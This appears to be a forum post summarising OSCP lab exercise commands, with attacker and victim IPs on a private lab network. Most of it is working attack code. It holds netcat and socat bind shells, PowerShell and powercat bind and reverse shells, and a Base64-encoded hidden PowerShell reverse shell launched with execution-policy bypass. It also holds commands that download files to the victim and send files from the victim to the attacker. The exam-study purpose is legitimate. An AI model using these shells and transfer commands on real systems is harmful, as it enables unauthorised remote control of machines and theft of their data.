Offensive Security Certified Professional‬‎ / OSCP |Module5 - Intro to bash scripting

I did a summary for the commands as you said , maybe anyone can benefit from them , thanks @Limbo
#خليك_اسطوره


Exercises commands (questions & answers)


Lab configuration

Attacker : 192.168.10.51
victim linux : 192.168.10.52
victim windows:192.168.10.50

---------------------------------------------------------------------------------------------------------------------------------
#1.connect to port using nc & socat

using netcat

attacker:
nc -nv 192.168.10.52 4444

victim:
nc -nlvp 4444

using socat
attacker:
socate -dd - tcp4:192.168.10.52:4444

victim:
socat -ddd tcp4-listen:4444 stdout



---------------------------------------------------------------------------------------------------------------------------------
#2. send file using nc & socat

netcat :
victim:
nc -nlvp 4444 < ~/Desktop/latest/rtl8821CU/wlan0dhcp

client :
nc -nv 192.168.10.52 4444 > abc

******
socat

client:
socat tcp4:192.168.10.52:4444 file:abc.txt,create
server:
socat tcp4-listen:4444,fork file:~/Desktop/file.txt


---------------------------------------------------------------------------------------------------------------------------------
#3.bind shell to execute a command using nc & socat

netcat

victim:
nc -nlvp 4444 -e /bin/bash

client:
nc -nv 192.168.10.52 4444

********
socat

victim
socat tcp4-listen:4445,fork exec:/bin/bash

client
socat tcp4:192.168.10.52:4445 stdout


---------------------------------------------------------------------------------------------------------------------------------
#4. receive file using powershell

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.10.51:8000/amr.txt','C:\Users\victim\Desktop\amr2.txt')"





---------------------------------------------------------------------------------------------------------------------------------
#5. bind shell using powershell

victim (cmd) :
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',4444);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"


attacket:

nc -nv 192.168.10.50 4444



---------------------------------------------------------------------------------------------------------------------------------
#6. reverse bind using powershell

victim (make sure to change the ip &/or port ):

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.10.51',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

attacker:
nc -nlvp 4444


---------------------------------------------------------------------------------------------------------------------------------
#7. bind shell using powercat

attacker
nc -nv 192.168.10.50 4444

victim
powercat -l -p 4444 -e cmd.exe

---------------------------------------------------------------------------------------------------------------------------------
#8. reverse bind using powercat

victim
powercat -c 192.168.10.51 -p 4444 -e cmd.exe

attacker:
nv -nlvp 4444


---------------------------------------------------------------------------------------------------------------------------------
#9.encoding command to gain accessusing the python tool (use on cmd)

./reversesg.py 192.168.10.51 4444

powershell -NoP -NonI -W Hidden -Exec Bypass -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEAMAAuADUAMQAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
--------------------------------------------------------------------------------------------------------------------------------------------------------
#10. sending file from victim's machine to our machine


victim
powercat -c 192.168.10.51 -p 8000 -i C:\Users\victim\Desktop\amr2.ps


attacker (just listening):
nc -nlvp 8000 > aaaaa.txt